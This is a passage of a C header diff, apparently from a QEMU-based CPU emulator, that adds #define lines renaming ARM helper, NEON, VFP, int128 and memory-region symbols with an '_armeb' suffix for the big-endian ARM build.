helper_iwmmxt_unpackhul_armeb +#define helper_iwmmxt_unpackhuw helper_iwmmxt_unpackhuw_armeb +#define helper_iwmmxt_unpackhw helper_iwmmxt_unpackhw_armeb +#define helper_iwmmxt_unpacklb helper_iwmmxt_unpacklb_armeb +#define helper_iwmmxt_unpackll helper_iwmmxt_unpackll_armeb +#define helper_iwmmxt_unpacklsb helper_iwmmxt_unpacklsb_armeb +#define helper_iwmmxt_unpacklsl helper_iwmmxt_unpacklsl_armeb +#define helper_iwmmxt_unpacklsw helper_iwmmxt_unpacklsw_armeb +#define helper_iwmmxt_unpacklub helper_iwmmxt_unpacklub_armeb +#define helper_iwmmxt_unpacklul helper_iwmmxt_unpacklul_armeb +#define helper_iwmmxt_unpackluw helper_iwmmxt_unpackluw_armeb +#define helper_iwmmxt_unpacklw helper_iwmmxt_unpacklw_armeb +#define helper_ldb_cmmu helper_ldb_cmmu_armeb +#define helper_ldb_mmu helper_ldb_mmu_armeb +#define helper_ldl_cmmu helper_ldl_cmmu_armeb +#define helper_ldl_mmu helper_ldl_mmu_armeb +#define helper_ldq_cmmu helper_ldq_cmmu_armeb +#define helper_ldq_mmu helper_ldq_mmu_armeb +#define helper_ldw_cmmu helper_ldw_cmmu_armeb +#define helper_ldw_mmu helper_ldw_mmu_armeb +#define helper_le_ldl_cmmu helper_le_ldl_cmmu_armeb +#define helper_le_ldq_cmmu helper_le_ldq_cmmu_armeb +#define helper_le_ldq_mmu helper_le_ldq_mmu_armeb +#define helper_le_ldsl_mmu helper_le_ldsl_mmu_armeb +#define helper_le_ldsw_mmu helper_le_ldsw_mmu_armeb +#define helper_le_ldul_mmu helper_le_ldul_mmu_armeb +#define helper_le_lduw_mmu helper_le_lduw_mmu_armeb +#define helper_le_ldw_cmmu helper_le_ldw_cmmu_armeb +#define helper_le_stl_mmu helper_le_stl_mmu_armeb +#define helper_le_stq_mmu helper_le_stq_mmu_armeb +#define helper_le_stw_mmu helper_le_stw_mmu_armeb +#define helper_msr_i_pstate helper_msr_i_pstate_armeb +#define helper_neon_abd_f32 helper_neon_abd_f32_armeb +#define helper_neon_abdl_s16 helper_neon_abdl_s16_armeb +#define helper_neon_abdl_s32 helper_neon_abdl_s32_armeb +#define helper_neon_abdl_s64 helper_neon_abdl_s64_armeb +#define helper_neon_abdl_u16 helper_neon_abdl_u16_armeb +#define helper_neon_abdl_u32 helper_neon_abdl_u32_armeb +#define helper_neon_abdl_u64 helper_neon_abdl_u64_armeb +#define helper_neon_abd_s16 helper_neon_abd_s16_armeb +#define helper_neon_abd_s32 helper_neon_abd_s32_armeb +#define helper_neon_abd_s8 helper_neon_abd_s8_armeb +#define helper_neon_abd_u16 helper_neon_abd_u16_armeb +#define helper_neon_abd_u32 helper_neon_abd_u32_armeb +#define helper_neon_abd_u8 helper_neon_abd_u8_armeb +#define helper_neon_abs_s16 helper_neon_abs_s16_armeb +#define helper_neon_abs_s8 helper_neon_abs_s8_armeb +#define helper_neon_acge_f32 helper_neon_acge_f32_armeb +#define helper_neon_acge_f64 helper_neon_acge_f64_armeb +#define helper_neon_acgt_f32 helper_neon_acgt_f32_armeb +#define helper_neon_acgt_f64 helper_neon_acgt_f64_armeb +#define helper_neon_addl_saturate_s32 helper_neon_addl_saturate_s32_armeb +#define helper_neon_addl_saturate_s64 helper_neon_addl_saturate_s64_armeb +#define helper_neon_addl_u16 helper_neon_addl_u16_armeb +#define helper_neon_addl_u32 helper_neon_addl_u32_armeb +#define helper_neon_add_u16 helper_neon_add_u16_armeb +#define helper_neon_add_u8 helper_neon_add_u8_armeb +#define helper_neon_ceq_f32 helper_neon_ceq_f32_armeb +#define helper_neon_ceq_u16 helper_neon_ceq_u16_armeb +#define helper_neon_ceq_u32 helper_neon_ceq_u32_armeb +#define helper_neon_ceq_u8 helper_neon_ceq_u8_armeb +#define helper_neon_cge_f32 helper_neon_cge_f32_armeb +#define helper_neon_cge_s16 helper_neon_cge_s16_armeb +#define helper_neon_cge_s32 helper_neon_cge_s32_armeb +#define helper_neon_cge_s8 helper_neon_cge_s8_armeb +#define helper_neon_cge_u16 helper_neon_cge_u16_armeb +#define helper_neon_cge_u32 helper_neon_cge_u32_armeb +#define helper_neon_cge_u8 helper_neon_cge_u8_armeb +#define helper_neon_cgt_f32 helper_neon_cgt_f32_armeb +#define helper_neon_cgt_s16 helper_neon_cgt_s16_armeb +#define helper_neon_cgt_s32 helper_neon_cgt_s32_armeb +#define helper_neon_cgt_s8 helper_neon_cgt_s8_armeb +#define helper_neon_cgt_u16 helper_neon_cgt_u16_armeb +#define helper_neon_cgt_u32 helper_neon_cgt_u32_armeb +#define helper_neon_cgt_u8 helper_neon_cgt_u8_armeb +#define helper_neon_cls_s16 helper_neon_cls_s16_armeb +#define helper_neon_cls_s32 helper_neon_cls_s32_armeb +#define helper_neon_cls_s8 helper_neon_cls_s8_armeb +#define helper_neon_clz_u16 helper_neon_clz_u16_armeb +#define helper_neon_clz_u8 helper_neon_clz_u8_armeb +#define helper_neon_cnt_u8 helper_neon_cnt_u8_armeb +#define helper_neon_fcvt_f16_to_f32 helper_neon_fcvt_f16_to_f32_armeb +#define helper_neon_fcvt_f32_to_f16 helper_neon_fcvt_f32_to_f16_armeb +#define helper_neon_hadd_s16 helper_neon_hadd_s16_armeb +#define helper_neon_hadd_s32 helper_neon_hadd_s32_armeb +#define helper_neon_hadd_s8 helper_neon_hadd_s8_armeb +#define helper_neon_hadd_u16 helper_neon_hadd_u16_armeb +#define helper_neon_hadd_u32 helper_neon_hadd_u32_armeb +#define helper_neon_hadd_u8 helper_neon_hadd_u8_armeb +#define helper_neon_hsub_s16 helper_neon_hsub_s16_armeb +#define helper_neon_hsub_s32 helper_neon_hsub_s32_armeb +#define helper_neon_hsub_s8 helper_neon_hsub_s8_armeb +#define helper_neon_hsub_u16 helper_neon_hsub_u16_armeb +#define helper_neon_hsub_u32 helper_neon_hsub_u32_armeb +#define helper_neon_hsub_u8 helper_neon_hsub_u8_armeb +#define helper_neon_max_s16 helper_neon_max_s16_armeb +#define helper_neon_max_s32 helper_neon_max_s32_armeb +#define helper_neon_max_s8 helper_neon_max_s8_armeb +#define helper_neon_max_u16 helper_neon_max_u16_armeb +#define helper_neon_max_u32 helper_neon_max_u32_armeb +#define helper_neon_max_u8 helper_neon_max_u8_armeb +#define helper_neon_min_s16 helper_neon_min_s16_armeb +#define helper_neon_min_s32 helper_neon_min_s32_armeb +#define helper_neon_min_s8 helper_neon_min_s8_armeb +#define helper_neon_min_u16 helper_neon_min_u16_armeb +#define helper_neon_min_u32 helper_neon_min_u32_armeb +#define helper_neon_min_u8 helper_neon_min_u8_armeb +#define helper_neon_mull_p8 helper_neon_mull_p8_armeb +#define helper_neon_mull_s16 helper_neon_mull_s16_armeb +#define helper_neon_mull_s8 helper_neon_mull_s8_armeb +#define helper_neon_mull_u16 helper_neon_mull_u16_armeb +#define helper_neon_mull_u8 helper_neon_mull_u8_armeb +#define helper_neon_mul_p8 helper_neon_mul_p8_armeb +#define helper_neon_mul_u16 helper_neon_mul_u16_armeb +#define helper_neon_mul_u8 helper_neon_mul_u8_armeb +#define helper_neon_narrow_high_u16 helper_neon_narrow_high_u16_armeb +#define helper_neon_narrow_high_u8 helper_neon_narrow_high_u8_armeb +#define helper_neon_narrow_round_high_u16 helper_neon_narrow_round_high_u16_armeb +#define helper_neon_narrow_round_high_u8 helper_neon_narrow_round_high_u8_armeb +#define helper_neon_narrow_sat_s16 helper_neon_narrow_sat_s16_armeb +#define helper_neon_narrow_sat_s32 helper_neon_narrow_sat_s32_armeb +#define helper_neon_narrow_sat_s8 helper_neon_narrow_sat_s8_armeb +#define helper_neon_narrow_sat_u16 helper_neon_narrow_sat_u16_armeb +#define helper_neon_narrow_sat_u32 helper_neon_narrow_sat_u32_armeb +#define helper_neon_narrow_sat_u8 helper_neon_narrow_sat_u8_armeb +#define helper_neon_narrow_u16 helper_neon_narrow_u16_armeb +#define helper_neon_narrow_u8 helper_neon_narrow_u8_armeb +#define helper_neon_negl_u16 helper_neon_negl_u16_armeb +#define helper_neon_negl_u32 helper_neon_negl_u32_armeb +#define helper_neon_paddl_u16 helper_neon_paddl_u16_armeb +#define helper_neon_paddl_u32 helper_neon_paddl_u32_armeb +#define helper_neon_padd_u16 helper_neon_padd_u16_armeb +#define helper_neon_padd_u8 helper_neon_padd_u8_armeb +#define helper_neon_pmax_s16 helper_neon_pmax_s16_armeb +#define helper_neon_pmax_s8 helper_neon_pmax_s8_armeb +#define helper_neon_pmax_u16 helper_neon_pmax_u16_armeb +#define helper_neon_pmax_u8 helper_neon_pmax_u8_armeb +#define helper_neon_pmin_s16 helper_neon_pmin_s16_armeb +#define helper_neon_pmin_s8 helper_neon_pmin_s8_armeb +#define helper_neon_pmin_u16 helper_neon_pmin_u16_armeb +#define helper_neon_pmin_u8 helper_neon_pmin_u8_armeb +#define helper_neon_pmull_64_hi helper_neon_pmull_64_hi_armeb +#define helper_neon_pmull_64_lo helper_neon_pmull_64_lo_armeb +#define helper_neon_qabs_s16 helper_neon_qabs_s16_armeb +#define helper_neon_qabs_s32 helper_neon_qabs_s32_armeb +#define helper_neon_qabs_s64 helper_neon_qabs_s64_armeb +#define helper_neon_qabs_s8 helper_neon_qabs_s8_armeb +#define helper_neon_qadd_s16 helper_neon_qadd_s16_armeb +#define helper_neon_qadd_s32 helper_neon_qadd_s32_armeb +#define helper_neon_qadd_s64 helper_neon_qadd_s64_armeb +#define helper_neon_qadd_s8 helper_neon_qadd_s8_armeb +#define helper_neon_qadd_u16 helper_neon_qadd_u16_armeb +#define helper_neon_qadd_u32 helper_neon_qadd_u32_armeb +#define helper_neon_qadd_u64 helper_neon_qadd_u64_armeb +#define helper_neon_qadd_u8 helper_neon_qadd_u8_armeb +#define helper_neon_qdmulh_s16 helper_neon_qdmulh_s16_armeb +#define helper_neon_qdmulh_s32 helper_neon_qdmulh_s32_armeb +#define helper_neon_qneg_s16 helper_neon_qneg_s16_armeb +#define helper_neon_qneg_s32 helper_neon_qneg_s32_armeb +#define helper_neon_qneg_s64 helper_neon_qneg_s64_armeb +#define helper_neon_qneg_s8 helper_neon_qneg_s8_armeb +#define helper_neon_qrdmulh_s16 helper_neon_qrdmulh_s16_armeb +#define helper_neon_qrdmulh_s32 helper_neon_qrdmulh_s32_armeb +#define helper_neon_qrshl_s16 helper_neon_qrshl_s16_armeb +#define helper_neon_qrshl_s32 helper_neon_qrshl_s32_armeb +#define helper_neon_qrshl_s64 helper_neon_qrshl_s64_armeb +#define helper_neon_qrshl_s8 helper_neon_qrshl_s8_armeb +#define helper_neon_qrshl_u16 helper_neon_qrshl_u16_armeb +#define helper_neon_qrshl_u32 helper_neon_qrshl_u32_armeb +#define helper_neon_qrshl_u64 helper_neon_qrshl_u64_armeb +#define helper_neon_qrshl_u8 helper_neon_qrshl_u8_armeb +#define helper_neon_qshl_s16 helper_neon_qshl_s16_armeb +#define helper_neon_qshl_s32 helper_neon_qshl_s32_armeb +#define helper_neon_qshl_s64 helper_neon_qshl_s64_armeb +#define helper_neon_qshl_s8 helper_neon_qshl_s8_armeb +#define helper_neon_qshl_u16 helper_neon_qshl_u16_armeb +#define helper_neon_qshl_u32 helper_neon_qshl_u32_armeb +#define helper_neon_qshl_u64 helper_neon_qshl_u64_armeb +#define helper_neon_qshl_u8 helper_neon_qshl_u8_armeb +#define helper_neon_qshlu_s16 helper_neon_qshlu_s16_armeb +#define helper_neon_qshlu_s32 helper_neon_qshlu_s32_armeb +#define helper_neon_qshlu_s64 helper_neon_qshlu_s64_armeb +#define helper_neon_qshlu_s8 helper_neon_qshlu_s8_armeb +#define helper_neon_qsub_s16 helper_neon_qsub_s16_armeb +#define helper_neon_qsub_s32 helper_neon_qsub_s32_armeb +#define helper_neon_qsub_s64 helper_neon_qsub_s64_armeb +#define helper_neon_qsub_s8 helper_neon_qsub_s8_armeb +#define helper_neon_qsub_u16 helper_neon_qsub_u16_armeb +#define helper_neon_qsub_u32 helper_neon_qsub_u32_armeb +#define helper_neon_qsub_u64 helper_neon_qsub_u64_armeb +#define helper_neon_qsub_u8 helper_neon_qsub_u8_armeb +#define helper_neon_qunzip16 helper_neon_qunzip16_armeb +#define helper_neon_qunzip32 helper_neon_qunzip32_armeb +#define helper_neon_qunzip8 helper_neon_qunzip8_armeb +#define helper_neon_qzip16 helper_neon_qzip16_armeb +#define helper_neon_qzip32 helper_neon_qzip32_armeb +#define helper_neon_qzip8 helper_neon_qzip8_armeb +#define helper_neon_rbit_u8 helper_neon_rbit_u8_armeb +#define helper_neon_rhadd_s16 helper_neon_rhadd_s16_armeb +#define helper_neon_rhadd_s32 helper_neon_rhadd_s32_armeb +#define helper_neon_rhadd_s8 helper_neon_rhadd_s8_armeb +#define helper_neon_rhadd_u16 helper_neon_rhadd_u16_armeb +#define helper_neon_rhadd_u32 helper_neon_rhadd_u32_armeb +#define helper_neon_rhadd_u8 helper_neon_rhadd_u8_armeb +#define helper_neon_rshl_s16 helper_neon_rshl_s16_armeb +#define helper_neon_rshl_s32 helper_neon_rshl_s32_armeb +#define helper_neon_rshl_s64 helper_neon_rshl_s64_armeb +#define helper_neon_rshl_s8 helper_neon_rshl_s8_armeb +#define helper_neon_rshl_u16 helper_neon_rshl_u16_armeb +#define helper_neon_rshl_u32 helper_neon_rshl_u32_armeb +#define helper_neon_rshl_u64 helper_neon_rshl_u64_armeb +#define helper_neon_rshl_u8 helper_neon_rshl_u8_armeb +#define helper_neon_shl_s16 helper_neon_shl_s16_armeb +#define helper_neon_shl_s32 helper_neon_shl_s32_armeb +#define helper_neon_shl_s64 helper_neon_shl_s64_armeb +#define helper_neon_shl_s8 helper_neon_shl_s8_armeb +#define helper_neon_shl_u16 helper_neon_shl_u16_armeb +#define helper_neon_shl_u32 helper_neon_shl_u32_armeb +#define helper_neon_shl_u64 helper_neon_shl_u64_armeb +#define helper_neon_shl_u8 helper_neon_shl_u8_armeb +#define helper_neon_sqadd_u16 helper_neon_sqadd_u16_armeb +#define helper_neon_sqadd_u32 helper_neon_sqadd_u32_armeb +#define helper_neon_sqadd_u64 helper_neon_sqadd_u64_armeb +#define helper_neon_sqadd_u8 helper_neon_sqadd_u8_armeb +#define helper_neon_subl_u16 helper_neon_subl_u16_armeb +#define helper_neon_subl_u32 helper_neon_subl_u32_armeb +#define helper_neon_sub_u16 helper_neon_sub_u16_armeb +#define helper_neon_sub_u8 helper_neon_sub_u8_armeb +#define helper_neon_tbl helper_neon_tbl_armeb +#define helper_neon_tst_u16 helper_neon_tst_u16_armeb +#define helper_neon_tst_u32 helper_neon_tst_u32_armeb +#define helper_neon_tst_u8 helper_neon_tst_u8_armeb +#define helper_neon_unarrow_sat16 helper_neon_unarrow_sat16_armeb +#define helper_neon_unarrow_sat32 helper_neon_unarrow_sat32_armeb +#define helper_neon_unarrow_sat8 helper_neon_unarrow_sat8_armeb +#define helper_neon_unzip16 helper_neon_unzip16_armeb +#define helper_neon_unzip8 helper_neon_unzip8_armeb +#define helper_neon_uqadd_s16 helper_neon_uqadd_s16_armeb +#define helper_neon_uqadd_s32 helper_neon_uqadd_s32_armeb +#define helper_neon_uqadd_s64 helper_neon_uqadd_s64_armeb +#define helper_neon_uqadd_s8 helper_neon_uqadd_s8_armeb +#define helper_neon_widen_s16 helper_neon_widen_s16_armeb +#define helper_neon_widen_s8 helper_neon_widen_s8_armeb +#define helper_neon_widen_u16 helper_neon_widen_u16_armeb +#define helper_neon_widen_u8 helper_neon_widen_u8_armeb +#define helper_neon_zip16 helper_neon_zip16_armeb +#define helper_neon_zip8 helper_neon_zip8_armeb +#define helper_pre_hvc helper_pre_hvc_armeb +#define helper_pre_smc helper_pre_smc_armeb +#define helper_qadd16 helper_qadd16_armeb +#define helper_qadd8 helper_qadd8_armeb +#define helper_qaddsubx helper_qaddsubx_armeb +#define helper_qsub16 helper_qsub16_armeb +#define helper_qsub8 helper_qsub8_armeb +#define helper_qsubaddx helper_qsubaddx_armeb +#define helper_rbit helper_rbit_armeb +#define helper_recpe_f32 helper_recpe_f32_armeb +#define helper_recpe_f64 helper_recpe_f64_armeb +#define helper_recpe_u32 helper_recpe_u32_armeb +#define helper_recps_f32 helper_recps_f32_armeb +#define helper_ret_ldb_cmmu helper_ret_ldb_cmmu_armeb +#define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_armeb +#define helper_ret_ldub_mmu helper_ret_ldub_mmu_armeb +#define helper_ret_stb_mmu helper_ret_stb_mmu_armeb +#define helper_rintd helper_rintd_armeb +#define helper_rintd_exact helper_rintd_exact_armeb +#define helper_rints helper_rints_armeb +#define helper_rints_exact helper_rints_exact_armeb +#define helper_ror_cc helper_ror_cc_armeb +#define helper_rsqrte_f32 helper_rsqrte_f32_armeb +#define helper_rsqrte_f64 helper_rsqrte_f64_armeb +#define helper_rsqrte_u32 helper_rsqrte_u32_armeb +#define helper_rsqrts_f32 helper_rsqrts_f32_armeb +#define helper_sadd16 helper_sadd16_armeb +#define helper_sadd8 helper_sadd8_armeb +#define helper_saddsubx helper_saddsubx_armeb +#define helper_sar_cc helper_sar_cc_armeb +#define helper_sdiv helper_sdiv_armeb +#define helper_sel_flags helper_sel_flags_armeb +#define helper_set_cp_reg helper_set_cp_reg_armeb +#define helper_set_cp_reg64 helper_set_cp_reg64_armeb +#define helper_set_neon_rmode helper_set_neon_rmode_armeb +#define helper_set_r13_banked helper_set_r13_banked_armeb +#define helper_set_rmode helper_set_rmode_armeb +#define helper_set_user_reg helper_set_user_reg_armeb +#define helper_shadd16 helper_shadd16_armeb +#define helper_shadd8 helper_shadd8_armeb +#define helper_shaddsubx helper_shaddsubx_armeb +#define helper_shl_cc helper_shl_cc_armeb +#define helper_shr_cc helper_shr_cc_armeb +#define helper_shsub16 helper_shsub16_armeb +#define helper_shsub8 helper_shsub8_armeb +#define helper_shsubaddx helper_shsubaddx_armeb +#define helper_ssat helper_ssat_armeb +#define helper_ssat16 helper_ssat16_armeb +#define helper_ssub16 helper_ssub16_armeb +#define helper_ssub8 helper_ssub8_armeb +#define helper_ssubaddx helper_ssubaddx_armeb +#define helper_stb_mmu helper_stb_mmu_armeb +#define helper_stl_mmu helper_stl_mmu_armeb +#define helper_stq_mmu helper_stq_mmu_armeb +#define helper_stw_mmu helper_stw_mmu_armeb +#define helper_sub_saturate helper_sub_saturate_armeb +#define helper_sub_usaturate helper_sub_usaturate_armeb +#define helper_sxtb16 helper_sxtb16_armeb +#define helper_uadd16 helper_uadd16_armeb +#define helper_uadd8 helper_uadd8_armeb +#define helper_uaddsubx helper_uaddsubx_armeb +#define helper_udiv helper_udiv_armeb +#define helper_uhadd16 helper_uhadd16_armeb +#define helper_uhadd8 helper_uhadd8_armeb +#define helper_uhaddsubx helper_uhaddsubx_armeb +#define helper_uhsub16 helper_uhsub16_armeb +#define helper_uhsub8 helper_uhsub8_armeb +#define helper_uhsubaddx helper_uhsubaddx_armeb +#define helper_uqadd16 helper_uqadd16_armeb +#define helper_uqadd8 helper_uqadd8_armeb +#define helper_uqaddsubx helper_uqaddsubx_armeb +#define helper_uqsub16 helper_uqsub16_armeb +#define helper_uqsub8 helper_uqsub8_armeb +#define helper_uqsubaddx helper_uqsubaddx_armeb +#define helper_usad8 helper_usad8_armeb +#define helper_usat helper_usat_armeb +#define helper_usat16 helper_usat16_armeb +#define helper_usub16 helper_usub16_armeb +#define helper_usub8 helper_usub8_armeb +#define helper_usubaddx helper_usubaddx_armeb +#define helper_uxtb16 helper_uxtb16_armeb +#define helper_v7m_mrs helper_v7m_mrs_armeb +#define helper_v7m_msr helper_v7m_msr_armeb +#define helper_vfp_absd helper_vfp_absd_armeb +#define helper_vfp_abss helper_vfp_abss_armeb +#define helper_vfp_addd helper_vfp_addd_armeb +#define helper_vfp_adds helper_vfp_adds_armeb +#define helper_vfp_cmpd helper_vfp_cmpd_armeb +#define helper_vfp_cmped helper_vfp_cmped_armeb +#define helper_vfp_cmpes helper_vfp_cmpes_armeb +#define helper_vfp_cmps helper_vfp_cmps_armeb +#define helper_vfp_divd helper_vfp_divd_armeb +#define helper_vfp_divs helper_vfp_divs_armeb +#define helper_vfp_fcvtds helper_vfp_fcvtds_armeb +#define helper_vfp_fcvt_f16_to_f32 helper_vfp_fcvt_f16_to_f32_armeb +#define helper_vfp_fcvt_f16_to_f64 helper_vfp_fcvt_f16_to_f64_armeb +#define helper_vfp_fcvt_f32_to_f16 helper_vfp_fcvt_f32_to_f16_armeb +#define helper_vfp_fcvt_f64_to_f16 helper_vfp_fcvt_f64_to_f16_armeb +#define helper_vfp_fcvtsd helper_vfp_fcvtsd_armeb +#define helper_vfp_get_fpscr helper_vfp_get_fpscr_armeb +#define helper_vfp_maxd helper_vfp_maxd_armeb +#define helper_vfp_maxnumd helper_vfp_maxnumd_armeb +#define helper_vfp_maxnums helper_vfp_maxnums_armeb +#define helper_vfp_maxs helper_vfp_maxs_armeb +#define helper_vfp_mind helper_vfp_mind_armeb +#define helper_vfp_minnumd helper_vfp_minnumd_armeb +#define helper_vfp_minnums helper_vfp_minnums_armeb +#define helper_vfp_mins helper_vfp_mins_armeb +#define helper_vfp_muladdd helper_vfp_muladdd_armeb +#define helper_vfp_muladds helper_vfp_muladds_armeb +#define helper_vfp_muld helper_vfp_muld_armeb +#define helper_vfp_muls helper_vfp_muls_armeb +#define helper_vfp_negd helper_vfp_negd_armeb +#define helper_vfp_negs helper_vfp_negs_armeb +#define helper_vfp_set_fpscr helper_vfp_set_fpscr_armeb +#define helper_vfp_shtod helper_vfp_shtod_armeb +#define helper_vfp_shtos helper_vfp_shtos_armeb +#define helper_vfp_sitod helper_vfp_sitod_armeb +#define helper_vfp_sitos helper_vfp_sitos_armeb +#define helper_vfp_sltod helper_vfp_sltod_armeb +#define helper_vfp_sltos helper_vfp_sltos_armeb +#define helper_vfp_sqrtd helper_vfp_sqrtd_armeb +#define helper_vfp_sqrts helper_vfp_sqrts_armeb +#define helper_vfp_sqtod helper_vfp_sqtod_armeb +#define helper_vfp_sqtos helper_vfp_sqtos_armeb +#define helper_vfp_subd helper_vfp_subd_armeb +#define helper_vfp_subs helper_vfp_subs_armeb +#define helper_vfp_toshd helper_vfp_toshd_armeb +#define helper_vfp_toshd_round_to_zero helper_vfp_toshd_round_to_zero_armeb +#define helper_vfp_toshs helper_vfp_toshs_armeb +#define helper_vfp_toshs_round_to_zero helper_vfp_toshs_round_to_zero_armeb +#define helper_vfp_tosid helper_vfp_tosid_armeb +#define helper_vfp_tosis helper_vfp_tosis_armeb +#define helper_vfp_tosizd helper_vfp_tosizd_armeb +#define helper_vfp_tosizs helper_vfp_tosizs_armeb +#define helper_vfp_tosld helper_vfp_tosld_armeb +#define helper_vfp_tosld_round_to_zero helper_vfp_tosld_round_to_zero_armeb +#define helper_vfp_tosls helper_vfp_tosls_armeb +#define helper_vfp_tosls_round_to_zero helper_vfp_tosls_round_to_zero_armeb +#define helper_vfp_tosqd helper_vfp_tosqd_armeb +#define helper_vfp_tosqs helper_vfp_tosqs_armeb +#define helper_vfp_touhd helper_vfp_touhd_armeb +#define helper_vfp_touhd_round_to_zero helper_vfp_touhd_round_to_zero_armeb +#define helper_vfp_touhs helper_vfp_touhs_armeb +#define helper_vfp_touhs_round_to_zero helper_vfp_touhs_round_to_zero_armeb +#define helper_vfp_touid helper_vfp_touid_armeb +#define helper_vfp_touis helper_vfp_touis_armeb +#define helper_vfp_touizd helper_vfp_touizd_armeb +#define helper_vfp_touizs helper_vfp_touizs_armeb +#define helper_vfp_tould helper_vfp_tould_armeb +#define helper_vfp_tould_round_to_zero helper_vfp_tould_round_to_zero_armeb +#define helper_vfp_touls helper_vfp_touls_armeb +#define helper_vfp_touls_round_to_zero helper_vfp_touls_round_to_zero_armeb +#define helper_vfp_touqd helper_vfp_touqd_armeb +#define helper_vfp_touqs helper_vfp_touqs_armeb +#define helper_vfp_uhtod helper_vfp_uhtod_armeb +#define helper_vfp_uhtos helper_vfp_uhtos_armeb +#define helper_vfp_uitod helper_vfp_uitod_armeb +#define helper_vfp_uitos helper_vfp_uitos_armeb +#define helper_vfp_ultod helper_vfp_ultod_armeb +#define helper_vfp_ultos helper_vfp_ultos_armeb +#define helper_vfp_uqtod helper_vfp_uqtod_armeb +#define helper_vfp_uqtos helper_vfp_uqtos_armeb +#define helper_wfe helper_wfe_armeb +#define helper_wfi helper_wfi_armeb +#define hex2decimal hex2decimal_armeb +#define hw_breakpoint_update hw_breakpoint_update_armeb +#define hw_breakpoint_update_all hw_breakpoint_update_all_armeb +#define hw_watchpoint_update hw_watchpoint_update_armeb +#define hw_watchpoint_update_all hw_watchpoint_update_all_armeb +#define _init _init_armeb +#define init_cpreg_list init_cpreg_list_armeb +#define init_lists init_lists_armeb +#define input_type_enum input_type_enum_armeb +#define int128_2_64 int128_2_64_armeb +#define int128_add int128_add_armeb +#define int128_addto int128_addto_armeb +#define int128_and int128_and_armeb +#define int128_eq int128_eq_armeb +#define int128_ge int128_ge_armeb +#define int128_get64 int128_get64_armeb +#define int128_gt int128_gt_armeb +#define int128_le int128_le_armeb +#define int128_lt int128_lt_armeb +#define int128_make64 int128_make64_armeb +#define int128_max int128_max_armeb +#define int128_min int128_min_armeb +#define int128_ne int128_ne_armeb +#define int128_neg int128_neg_armeb +#define int128_nz int128_nz_armeb +#define int128_rshift int128_rshift_armeb +#define int128_sub int128_sub_armeb +#define int128_subfrom int128_subfrom_armeb +#define int128_zero int128_zero_armeb +#define int16_to_float32 int16_to_float32_armeb +#define int16_to_float64 int16_to_float64_armeb +#define int32_to_float128 int32_to_float128_armeb +#define int32_to_float32 int32_to_float32_armeb +#define int32_to_float64 int32_to_float64_armeb +#define int32_to_floatx80 int32_to_floatx80_armeb +#define int64_to_float128 int64_to_float128_armeb +#define int64_to_float32 int64_to_float32_armeb +#define int64_to_float64 int64_to_float64_armeb +#define int64_to_floatx80 int64_to_floatx80_armeb +#define invalidate_and_set_dirty invalidate_and_set_dirty_armeb +#define invalidate_page_bitmap invalidate_page_bitmap_armeb +#define io_mem_read io_mem_read_armeb +#define io_mem_write io_mem_write_armeb +#define io_readb io_readb_armeb +#define io_readl io_readl_armeb +#define io_readq io_readq_armeb +#define io_readw io_readw_armeb +#define iotlb_to_region iotlb_to_region_armeb +#define io_writeb io_writeb_armeb +#define io_writel io_writel_armeb +#define io_writeq io_writeq_armeb +#define io_writew io_writew_armeb +#define is_a64 is_a64_armeb +#define is_help_option is_help_option_armeb +#define isr_read isr_read_armeb +#define is_valid_option_list is_valid_option_list_armeb +#define iwmmxt_load_creg iwmmxt_load_creg_armeb +#define iwmmxt_load_reg iwmmxt_load_reg_armeb +#define iwmmxt_store_creg iwmmxt_store_creg_armeb +#define iwmmxt_store_reg iwmmxt_store_reg_armeb +#define __jit_debug_descriptor __jit_debug_descriptor_armeb +#define __jit_debug_register_code __jit_debug_register_code_armeb +#define kvm_to_cpreg_id kvm_to_cpreg_id_armeb +#define last_ram_offset last_ram_offset_armeb +#define ldl_be_p ldl_be_p_armeb +#define ldl_be_phys ldl_be_phys_armeb +#define ldl_he_p ldl_he_p_armeb +#define ldl_le_p ldl_le_p_armeb +#define ldl_le_phys ldl_le_phys_armeb +#define ldl_phys ldl_phys_armeb +#define ldl_phys_internal ldl_phys_internal_armeb +#define ldq_be_p ldq_be_p_armeb +#define ldq_be_phys ldq_be_phys_armeb +#define ldq_he_p ldq_he_p_armeb +#define ldq_le_p ldq_le_p_armeb +#define ldq_le_phys ldq_le_phys_armeb +#define ldq_phys ldq_phys_armeb +#define ldq_phys_internal ldq_phys_internal_armeb +#define ldst_name ldst_name_armeb +#define ldub_p ldub_p_armeb +#define ldub_phys ldub_phys_armeb +#define lduw_be_p lduw_be_p_armeb +#define lduw_be_phys lduw_be_phys_armeb +#define lduw_he_p lduw_he_p_armeb +#define lduw_le_p lduw_le_p_armeb +#define lduw_le_phys lduw_le_phys_armeb +#define lduw_phys lduw_phys_armeb +#define lduw_phys_internal lduw_phys_internal_armeb +#define le128 le128_armeb +#define linked_bp_matches linked_bp_matches_armeb +#define listener_add_address_space listener_add_address_space_armeb +#define load_cpu_offset load_cpu_offset_armeb +#define load_reg load_reg_armeb +#define load_reg_var load_reg_var_armeb +#define log_cpu_state log_cpu_state_armeb +#define lpae_cp_reginfo lpae_cp_reginfo_armeb +#define lt128 lt128_armeb +#define machine_class_init machine_class_init_armeb +#define machine_finalize machine_finalize_armeb +#define machine_info machine_info_armeb +#define machine_initfn machine_initfn_armeb +#define machine_register_types machine_register_types_armeb +#define machvirt_init machvirt_init_armeb +#define machvirt_machine_init machvirt_machine_init_armeb +#define maj maj_armeb +#define mapping_conflict mapping_conflict_armeb +#define mapping_contiguous mapping_contiguous_armeb +#define mapping_have_same_region mapping_have_same_region_armeb +#define mapping_merge mapping_merge_armeb +#define mem_add mem_add_armeb +#define mem_begin mem_begin_armeb +#define mem_commit mem_commit_armeb +#define memory_access_is_direct memory_access_is_direct_armeb +#define memory_access_size memory_access_size_armeb +#define memory_init memory_init_armeb +#define memory_listener_match memory_listener_match_armeb +#define memory_listener_register memory_listener_register_armeb +#define memory_listener_unregister memory_listener_unregister_armeb +#define memory_map_init memory_map_init_armeb +#define memory_mapping_filter memory_mapping_filter_armeb +#define memory_mapping_list_add_mapping_sorted memory_mapping_list_add_mapping_sorted_armeb +#define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_armeb +#define memory_mapping_list_free memory_mapping_list_free_armeb +#define memory_mapping_list_init memory_mapping_list_init_armeb +#define memory_region_access_valid memory_region_access_valid_armeb +#define memory_region_add_subregion memory_region_add_subregion_armeb +#define memory_region_add_subregion_common memory_region_add_subregion_common_armeb +#define 